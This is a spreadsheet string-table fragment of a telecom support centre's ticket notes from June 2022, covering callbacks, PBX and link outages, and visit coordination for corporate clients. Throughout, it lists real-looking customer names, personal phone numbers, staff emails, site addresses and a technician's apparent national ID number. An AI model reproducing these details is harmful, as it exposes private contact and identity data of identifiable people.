GESTION DE PERMISOS: SOLO IDENTIFICADOS
ATENDERA EN SITIO: ROSA ELIETH
ID 1001554223
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROSA ELIETH  AL 57539670 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001554019
**</t>
  </si>
  <si>
    <t>F4591648</t>
  </si>
  <si>
    <t>SE LLAMA A CARLOS BARRIERE PARA COORDINAR VISITA TECNICA PERO NO RESPONDE. PERSONA QUE ATIENDE DICE QUE ES UN NUMERO EQUIVOCADO.
1001573007
COLA:
NOMBRE: A: 0050322999000
NÚMERO: 0050322999000
DURACIÓN: 0:00:04
ESTADO: MARCANDO
DETALLES: 0050322999000
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 6/06/2022 13:14:17</t>
  </si>
  <si>
    <t>F4591650</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO AL CLIENTE Y SE QUEDA EN ESPERA DE SU COMENTARIO
RE: LÍNEA TELEFÓNICA ASEGURO - BAM
ESVIN ANTONIO PAREDES SAMUY
BUENAS TARDES ESTIMADO CLIENTE, SE LE HABÍA INFORMADO AL SEÑOR BYRON VELIZ, QUE POR PARTE DE NUESTRO PERSONAL ESPECIALISTA REALIZO TRAZAS HACIA EL NÚMERO QUE USTEDES REPORTAN:  2279-8822 Y LA LIBERACIÓN QUE SE PERCIBE ES POR PARTE DE LA PBX.  EN LA TRONCAL E1 NO SE OBSERVA INCONVENIENTES POR EL MOMENTO.
COMO PRIMER DESCARTE PODRÍAN INDICARNOS SI EL PROVEEDOR YA REALIZO TRAZAS EN SU PBX Y VALIDAR QUE MENSAJE DE DESCONEXIÓN LE APARECE. COMO SEGUNDA OPCIÓN DESPUÉS DE REALIZAR EL PRIMER DESCARTE, SE PODRÍA REALIZAR UNA CONFERENCIA ENTRE NUESTRO PERSONAL ESPECIALISTA Y SU PROVEEDOR PARA QUE SE REALICEN PRUEBAS EN CONJUNTO.
QUEDAMOS ATENTOS A SU RESPUESTA.
SALUDOS.</t>
  </si>
  <si>
    <t>INFORMA CLIENTE LUIS MARIN 56955349 QUE NO ESTÁ RECIBIENDO LLAMADAS AL 22798822, INDICA QUE ES UN NÚMERO DIRECTO Y QUE EL INCONVENIENTE INICIÓ EL DÍA DE HOY. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE REALIZA CONFERENCIA ENTRE JORGE CHAVARRIA Y NOE (PROVEEDOR DE LA PBX) SE REALIZAN PRUEBAS LLAMANDO DESDE EL GDN 22798800 HACIA EL Y 22079115 Y EL PROVEEDOR VALIDA QUE EL SERVICIO YA FUNCIONA DE MANERA NORMAL. SE INTENTA LLAMAR AL CLIENTE FINAL PERO ENVIA A BUZON. PROVEEDOR SOLICITA SE ENVIE CORREO AL CLIENTE PARA QUE REALICEN PRUEBAS Y VALIDAR EL CIERRE.
RESULTADO: LLAMADA HECHA
NOMBRE: PARTICIPANTE DE CONFERENCIA
NÚMERO:
INICIO: HOY, 12:58 P. M.
FIN: HOY, 01:05 P. M.
DURACIÓN: 7:03
ID DE LLAMADA: 2001012003</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A IVONNE CABRERA/CLIENTE, LUIS MARÍN/IT CLIENTE BAM Y A TÉCNICO PBX PARA SEGUIMIENTO, SE PIDE APOYO A GESTIÓN AE VÍA SKYPE; VÍA TELEFÓNICA APOYA ULIL LÓPEZ/GESTOR AE; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE BYRON ALFONSO VELIZ RODRIGUEZ A QUIEN SE LE INDICA QUE SU PBX ESTA LIBERANDO LAS LLAMADAS AL 2279-8822, INDICA QUE SU PROVEEDOR ESTA REVISANDO Y SOLICITA SE LE MARQUE A LAS 15 HORAS.
1001701561
COLA:
NOMBRE: A: 47690130
NÚMERO: 47690130
DURACIÓN: 0:00:06
ESTADO: MARCANDO
DETALLES: 47690130
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 7/06/2022 08:57:14</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A IVON CABRERA Y A TÉCNICO DE LA PBX, SE ENLAZA A LA LLAMADA A JORGE CHAVARRIA DE CX PARA VERIFICAR EL INCONVENIENTE, SE DETERMINA QUE EL PROBLEMA ES QUE EL CLIENTE INTENTA LLAMAR AL 22079115 DESDE SU GDN PERO LA LLAMADA NO COMPLETA, AL LLAMAR DESDE CELULARES LA LLAMADA SÍ COMPLETA. SE LE INDICA AL CLIENTE QUE SE VERIFICARÁ CON APOYO DE CX, SE LE LLAMARÁ AL CLIENTE AL TENER AVANCES. ID: 1001992497</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 47690130 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; HAY COLA DE CORREOS CON EL ESCENARIO PLANTEADO:
ASUNTO: RE: LÍNEA TELEFÓNICA ASEGURO - BAM</t>
  </si>
  <si>
    <t>F4591658</t>
  </si>
  <si>
    <t>CLIENTE ARNOLDO SANCHEZ 70741440 VALIDA ##
1001735221
COLA:
NOMBRE: A: 0050370741440
NÚMERO: 0050370741440
DURACIÓN: 0:00:22
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050370741440
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 10:31:48</t>
  </si>
  <si>
    <t>SE LLLAMA A LCIENTE SR. VALENZUELA VILLEDA-70741440  ##SE HA LLAMADO A CLIENTE 3 VECES ##ENVIA A BUZON ## SE INTENTRARA NUEVAMENTE EN BREVE ##VIVO</t>
  </si>
  <si>
    <t>SR. VALENZUELA VILLEDA-70741440 CONTETA OTRO AGENTE E INDICA QUE SE LLAME EN 20 MINUTOS## DON VILLEDA NO ESTA ##
1001566639
COLA:
NOMBRE: A: 0050370741440
NÚMERO: 0050370741440
DURACIÓN: 0:01:02
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050370741440
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 6/06/2022 12:54:39</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. VALENZUELA VILLEDA-70741440
1001703899
COLA:
NOMBRE: A: 0050370741440
NÚMERO: 0050370741440
DURACIÓN: 0:00:15
ESTADO: MARCANDO
DETALLES: 0050370741440
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 09:04:38</t>
  </si>
  <si>
    <t>CONSTESTA CLIENTE  ARNOLDO SANCHEZ 70741440 NO APOYA EN NADA Y EXIGE CERTIFICACION ### SE LE TRATA DE PERSUADIR PERO SOLICITA QUE LLEGUE PERSONAL TECNICO A DEMOSTRAR QUE EL PROBLEMA ES LA PBX- ##SE TOAMN DATOS</t>
  </si>
  <si>
    <t>F4591663</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANCICO FLORES AL 79196262 INDICA QUE AL CONECTAR EL ROUTER  FIREWALL NO TIENE NAVEGACION PROBLEMA INDICA CON EL ANCHO DE BANDA || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001552025
**</t>
  </si>
  <si>
    <t>F4591669</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYRA 88649397 ENVIA DIRECTAMENTE A BUZON
-ID 1001555687</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYRA 88649397 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 1001618078</t>
  </si>
  <si>
    <t>F4591676</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A BLANCA CRUZ/CLIENTE; SE LE INDICA QUE SE HARÁ LA REVISIÓN DE EQUIPO EN NODO, POSIBLE FALLA EN SECTOR, AVANCES EN DOS HORAS.
CLIENTE INDICA QUE SE RETIRA A LAS 17:00 HORAS.</t>
  </si>
  <si>
    <t>F4591690</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS###
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: LUNES, 6 DE JUNIO DE 2022 13:15
PARA: OSCAR PORTILLO &lt;OPORTILLO@5B.COM.GT&gt;; ENLACES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5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 806300120T |TRANSACCIONES Y TRANSFERENCIAS S.A. | (ATM 2472) BANRURAL AUTOBANCO BARBERENA - BANRURAL AUTOBANCO BARBERENA KILOMETRO 55 SALIDA A NUEVA S
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 806300120T |TRANSACCIONES Y TRANSFERENCIAS S.A. | (ATM 2472) BANRURAL AUTOBANCO BARBERENA - BANRURAL AUTOBANCO BARBERENA KILOMETRO 55 SALIDA A NUEVA S
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO PARA EL DÍA DE MAÑANA 07/06/2021 A LAS 8 AM
TECNICOS:
BRIAN ROGELIO JOSIMAR CARRILLO ARGUETA	530027	2215 80395 0101
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>###SE RECIBE RESPUESTA POR PARTE DEL CLIENTE##
SE COORDINA VISITA PARA MAÑANA A LAS 8 30  AM
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 13:24
PARA: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
CC: TTI@5B.COM.GT &lt;TTI@5B.COM.GT&gt;; SUPERVISORES_OSI@5B.COM.GT &lt;SUPERVISORES_OSI@5B.COM.GT&gt;; OPERADORESIST@5B.COM.GT &lt;OPERADORESIST@5B.COM.GT&gt;; TELECOMUNICACIONES@5B.CM.GT &lt;TELECOMUNICACIONES@5B.CM.GT&gt;; ENLACES@5B.COM.GT &lt;ENLACES@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; OPORTILLO@5B.COM.GT &lt;OPORTILLO@5B.COM.GT&gt;
ASUNTO: RE: [SOLICITUD :##RE-758956##] : GESTIÓN DE PERMISOS | 806300120T |TRANSACCIONES Y TRANSFERENCIAS S.A. | (ATM 2472) BANRURAL AUTOBANCO BARBERENA - BANRURAL AUTOBANCO BARBERENA KILOMETRO 55 SALIDA A NUEVA S
BUENA TARDE ACCESO SOLICITADO , FAVOR QUE PERSONAL DE PRESENTE A LA AGENCIA A LAS 8:30 HORAS YA QUE A ESA HORA APERTURA LA AGENCIA.
ORLANDO RAMIREZ
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>F4591691</t>
  </si>
  <si>
    <t xml:space="preserve">  SE LLAMA A CLIENTE SR. DANILO NAJERO 31829058 NO CONTESTO, IVR ENVIA A BUZON, ID: 1001576046.</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA A CLIENTE SR. DANILO NAJERO 31829058 SOLICITARA EL REINICIO A PERSONAL DEL PUNTO REMOTO, SOLICITA LLAMAR EN 30 MINS.</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA A CLIENTE SR. DANILO NAJERO 31829058 INFORMA QUE VALIDARON LOS EQUIPO CON ENERGIA Y APLICARON REINICIO PERO ENLACE AUN NO LEVANTA, SE PROCEDE A SOLICITAR APOYO DE PERSONAL TECNICO...</t>
  </si>
  <si>
    <t>F4591736</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO ANTONIO CHICOP AL 50188573 NO RESPONDE || ENVIA A BUZON ||
SE INTENTARA LUEGO **
ID 1001570959
**</t>
  </si>
  <si>
    <t>CLIENTE MARCO ANTONIO CHICOP 50188573 REALIZA PRUEBAS Y VALIDA EL E1 ACTIVO, AUTORIZA EL CIERRE DEL CASO.  ID: 1001577242</t>
  </si>
  <si>
    <t>F4591741</t>
  </si>
  <si>
    <t>SE LLAMA A ELMER REYES PERO NO RESPONDE
1001571136
COLA:
NOMBRE: A: 50376445604
NÚMERO: 50376445604
DURACIÓN: 0:00:38
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50376445604
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 6/06/2022 13:08:52</t>
  </si>
  <si>
    <t>F4591744</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE PABLO PERO NO CONTESTA. SE LLAMARA ENSEGUIDA.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE PABLO QUIEN INDICA QUE YA POSEEN LLAMADAS EN AMBAS VIAS.
SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
CLIENTE INDICA QUE LA PBX HABIA BLOQUEADO LA IP DE CLARO.</t>
  </si>
  <si>
    <t>F4591754</t>
  </si>
  <si>
    <t>SE LLAA  ACLIENTE FRANCICO FLORES 79196262 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001766815</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCICO FLORES 79196262 MWNCIONA QUE NO SE ENCUENTRA EN PR  POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 10:00
-ID 1001620241</t>
  </si>
  <si>
    <t>F4591756</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE  CARLOS JAVIER GAVARRETE GARCÍA OFICIAL DE MONITOREO NOC  BANCO FICOHSA  SERVICIOS IT TEL (504) 2239-6410 EXT. 2310, INDICA QUE ESTARA PROPORCIONANDO CONTACTO DE PUNTO REMOTO, POR LO QUE SOLICITA SE LE LLAME EN 20 MINUTOS APROXIMADAMENTE..
1001582146
COLA:
NOMBRE: A: 0050422396410
NÚMERO: 0050422396410
DURACIÓN: 0:02:06
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050422396410
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 6/06/2022 13:44:50</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE CARLOS JAVIER GAVARRETE GARCIA COMENTA QUE YA SE VALIDARON PRUEBAS DE PRIMER NIVEL PERO SERVICIO NO LEVANTA, POR LO QUE SE CORDINARA VISITA TECNICA.
1001603493
COLA:
NOMBRE: A: 0050422396410
NÚMERO: 0050422396410
DURACIÓN: 0:04:11
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050422396410
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 6/06/2022 14:57:11</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22396410  EXT. 2310 MENCIONA QUE NO TIENE LOS DATOS DE LA VISITA POR LO QUE BRINDA CONTACTO ALEX GIRON - 31923155
-ID 1001611188</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX GIRON - 31923155 SE LE SOLICITA APOYO PARA LLENAR DATOS DE VISITA TECNICA PERO DEJA EN ESPERA Y NO RETOMA LA LLAMADA
-ID 1001612278
NOMBRE DEL CLIENTE: BANCO FINANCIERA COMERCIAL HONDURENA S.A. -
UBICACIÓN:CARRETERA EL PARAISO KILOMETRO 8 TABACABERAS DE ORIENTE
CONTACTO EN SITIO:  ALEX GIRON - 31923155
GESTIÓN DE PERMISOS: CARLOS.GAVARRETE@FICOHSA.COM</t>
  </si>
  <si>
    <t>F4591757</t>
  </si>
  <si>
    <t>SE ENVIA CORREO  A CLIENTE
ENLACE TROPIGAS PATULUL INESTABLE</t>
  </si>
  <si>
    <t>F4591764</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTINA MORALES 79349156 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001623260</t>
  </si>
  <si>
    <t>F4591765</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL NO RESPONDE, SE INTENTARA LUEGO
-ID 1001630499</t>
  </si>
  <si>
    <t>F4591777</t>
  </si>
  <si>
    <t>NO SE OBSERVA RESPUESTA DE CLIENTE, SE ENVIA CORREO NUEVAMENTE SOLICITANDO AVANCES DEL INCIDENTE REPORTADO
RE: SOLICITUD DE APERTURA DE TICKET | INC000003759620</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JORGE QUIÑONEZ 4151 2784 NO CONTESTO IVR ENVIA A BUZON, ID: 1001784022.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO CON LA INFORMACION PROPORCIONADA POR TIWS. A LA ESPERA DE VALIDACION...
ASUNTO:  EVIDENCIA ENLACE OPERATIVO Y ESTABLE 941500002 || GLOBAL MOBILITY APEX S.A..</t>
  </si>
  <si>
    <t>F4591790</t>
  </si>
  <si>
    <t>SE NOTIFICA A CLIENTE VIA CORREO
DE: WILLIAM GABRIEL SANAVRIA
ENVIADO: LUNES, 6 DE JUNIO DE 2022 14:3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C_BANRURAL_GT_AGENCIA_0830
ESTIMADO CLIENTE:
LE SALUDO CORDIALMENTE, ASÍ MISMO INFORMAMOS QUE TENEMOS UNA ALARMA PROACTIVA CON RESPECTO AL SIGUIENTE SERVICIO EL CUAL ESTÁ SIENDO AFECTADO POR FALLA MASIVA EN EL ÁREA:
MASIVA: F4591921
TICKET: F4591790
ID: 8901956T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0830
UBICADO EN: REDUNDANCIA WIMAX.- KM. 15 CARRETERA A SAN PEDRO SAC. COLONIA LAS BRISAS, ZONA 6 DE MIXCO, SAN PEDRO
NUESTRO EQUIPO TÉCNICO YA ESTÁ TRABAJANDO PARA SOLUCIONAR EL INCONVENIENTE,</t>
  </si>
  <si>
    <t>F4591807</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. ANGELA ALCANTARA 8884-8126 INFORMA QUE EN SITIO NO HABIA ENERGIA COMERCIAL, PERO NO PODRA VALIDAR HOY EN SITIO POR PROBLEMAS DE SALUD, HASTA MAÑANA LLEGARA AL SITIO PARA VALIDAR EL ESTADO DE LOS EQUIPOS, SOLICITA LA LLAMADA PARA MAÑANA MIERCOLES DESPUES DE LAS 8:00 AM.</t>
  </si>
  <si>
    <t>F4591808</t>
  </si>
  <si>
    <t>** SE HABLA CON CINTIA (CLIENTE) INFORMA QUE AUN NO CUENTAN CON SERVICIO, SE LE SOLICITA APOYO EN REINICIO DE LOS EQUIPOS A SOLICITUD DE JUAN MANUEL CARDONA, LOS REINICIA, SERVICIO CONTINUA CAIDO SEGUN COMENTA, SE LE INDICA QUE SE VERIFICARA Y SE LE DEVOLVERA LA LLAMADA EN BREVE -*
-*</t>
  </si>
  <si>
    <t>F4591819</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS RIVERA 55662572 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001610236</t>
  </si>
  <si>
    <t>SE LLAMA A LUIS PARA VALIDAR FUNCIONAMIENTO DEL SERVICIO --&gt;
INDICA QUE ESTA MONITOREANDO EL SERVICIO YA QUE COMENTA QUE PERCIBIO CAIDAS DURANTE LA MAÑANA, SOLICITA SEGUNDA LLAMADA AL REDEDOR DE LAS 3 PM.--
55662572</t>
  </si>
  <si>
    <t>F4591823</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 RESPONDE GERARDO  MENCIONA QUE ESTAN A LA ESPERA DE RESPUESTA POR PARTE DE CLIENTE FINAL
-ID 1001632843</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 16:31
PARA: DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; SANCHEZ MANRRIQUEZ MARIA GUADALUPE &lt;MSMANRRI@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL PA-MNCSCT0001IN-TDA ::: TICKET CNOC IMSCI002986 ::: "LATENCIA"
*-*-*-*</t>
  </si>
  <si>
    <t>F4591837</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERT ANDINO 94954333 MENCIONA QUE YA APLICO UN SEGUNDO REINICIO PERO EL SERVICIO NO RESTABLECE
-ID 1001690307
NOMBRE DEL CLIENTE: AGROPECUARIA MONTELIBANO S.A.
UBICACIÓN:FINCA SANTA ROSA  CARRETERA A COYOLITO 2 KM DEL DESVIÓ DEL KM 12 ALDEA GUANACASTE PROYECTO SANTA ROSA
CONTACTO EN SITIO: ROBERT ANDINO 94954333
HORARIO DE ATENCION:HASTA LAS 16:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SR. ROBERT ANDINO 94954333 INFORMA QUE NO HAY PERSONAL EN SITIO REMOTO PARA REALIZAR PRUEBAS, SOLICITA REGRESAR LA LLAMADA MAÑANA MIERCOLES 7 A LAS 8:00 AM.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ROBERT ANDINO 94954333  INFORMA QUE SOLICITARA EL REINICIO DE LOS EQUIPOS AL PERSONAL DEL PUNTO REMOTO, SOLICITA LLAMAR EN 30 MINS.</t>
  </si>
  <si>
    <t>F4591840</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JORGE ELIAS QUIEN INDICA QUE EN LA LINEA SE ESCUCHA INTERFERENCIA.
1001601584
COLA:
NOMBRE: A: 0050325278555
NÚMERO: 0050325278555
DURACIÓN: 0:01:25
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050325278555
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 6/06/2022 14:47:18</t>
  </si>
  <si>
    <t>F4591843</t>
  </si>
  <si>
    <t>**SE LLAMARA A CLIENTE BYRON BORJA AL 63127245 - 77457376 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001593042 - 1001593228
**</t>
  </si>
  <si>
    <t>F4591849</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR FERNANDO AZUCENA 78591523 NO CONTESTA IVR ENVIA A BUZON, ID: 1001757770.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO AZUCENA 78591523  MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 8:00 HRS
-ID 1001650087</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO AZUCENA 78591523 NO REPONDE, SE INTENTARA LUEGO
-ID 1001637909</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  FERNANDO AZUCENA AL 78591523 SOLICITA QUE SE LE LLAME A LA PERSONA QUE ESTA EN SITIO AL NUMERO  78615555 PARA CORDINAR LA VISITA **
ID 1001788890
**</t>
  </si>
  <si>
    <t>SE CONVERSA CLIENTE FERNANDO AZUCENA, INDICA QUE  NO SE ENCUENTRA EN SITIO EN ESTE MOMENTO POR LO QUE SOLICITA SE LE LLAME A LAS 15:30 HORAS.
1001594299
COLA:
NOMBRE: A: 0050378591523
NÚMERO: 0050378591523
DURACIÓN: 0:02:51
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050378591523
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 6/06/2022 14:25:43</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO AZUCENA AL 78591523 NO RESPONDE, ENVIA A BUZO  ||
SE INTENTARA LUEGO **
ID 1001619029
**</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE INFORMADO QUE YA VALIDARAN LAS PRUEBAS DE PRIMER NIVEL, SOLICITA VISITA TECNICA YA QUE ENLACE AUN NO LEVANTA...</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  AL 78615555 CONTESTA EL SEÑOR DAVID SUAREZ Y BRINDA LOS SIGUIENTES DATOS**
HORARIO DE ATENCION: LAS 24 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: KILOMETRO 13 CARRETERA AL VOLCAN SANTA TECLA RESIDENCIALES QUINTAS DE LA MONTAÑA.
ATENDERA EN SITIO: DAVID SUAREZ
ID 1001790310
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  FERNANDO AZUCENA 78591523  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001705094</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO AZUCENA 78591523  RESPONDE PERO DEJA EN ESPERA, SE ESPERA POR MAS DE 2 MINUTOS Y NO RETOMA LA LLAMADA
-ID 1001688319</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE NECESITA REALIZAR PRUEBAS DE PRIMER NIVEL.
ASUNTO:  PRUEBAS DE PRIMER NIVEL SD1132627 || ID1024261 || SISTEMAS COMESTIBLES, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4591850</t>
  </si>
  <si>
    <t>A LA ESPERA DE QUE CLIENTE VALIDA LA RUTA DE RETORNO DEL EQUIPO FORTINE, ASÍ MISMO VALIDA QUE ATRAVEZ DE ESA RUTA TENGA SALIDA HACIA LA LAN DE PUNTO REMOTO
1001706301
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 7739
DURACIÓN: 1:03:03
ESTADO: CONECTADA
DETALLES: 7739
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 7/06/2022 10:14:24</t>
  </si>
  <si>
    <t>F4591856</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 RESPONDE GUADALUPE MENCIONA QUE VALIDARA LOS PERMISOS CON CLIENTE FINAL, DEJA EN ESPERA Y NO RETOMA LA LLAMADA
-ID 1001847866</t>
  </si>
  <si>
    <t>ALEX PORTILLO (+504 94524038)  INFORMA QUE NO LOGRO UBICAR EL EQUIPO IMC Y EL ROUTER YA QUE HAY BASTANTES EQUIPOS Y PARA NO BOTAR OTRO ENLACE, SE PROCEDE A SOLICITAR APOYO DE O&amp;M.</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE ALEX PORTILLO (+504 94524038)  SOLICITA QUE SE REGRESE LA LLAMADA EN 5 MINS ...
DESDE IMC SE OBSERVA QUE EL ROUTER ESTA DESCONECTADO:
TEL VPN MONITOREO 10.81.81.236
-------------------------   PORT STATUS VALUES   -----------------------------
                 OPTICS                DATA                  EXT MGMT
LINK STATUS      UP                    DOWN                  DOWN
LINK LOST CNTR   0                     0                     0
DUPLEX STATUS    FULL                  HALF                  HALF
PORT SPEED       100 MBITS             10 MBITS              10 MBITS
-------------------------  PORT CONTROL SETTINGS  ----------------------------
PORT ENABLE                            ENABLED               ENABLED
ADMIN STATUS                           UP                    UP
PORT SPEED CTRL                        AUTONEG.              AUTONEG.
ADVERTISE CTRL                         ADVERT ALL            ADVERT ALL
ADVERTISE FLOWC                        ADV FLOW              ADV FLOW
FORCE FLOWCTRL   FLOWCTL ON            FRC FLOWCT            FRC FLOWCT
USE ARROW KEYS TO MOVE CURSOR. PRESS SPACE BAR TO CHANGE VALUE.
PRESS RETURN TO SET NEW VALUE. PRESS Q OR F4 TO EXIT.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTAN PERO DEJAN EN ESPERA LA LLAMADA Y NO RETOMAN SE INTENTARA LUEGO **
-ID 1001855871
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, SE VALIDA SERVICIO OPERATIVO
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 16:37
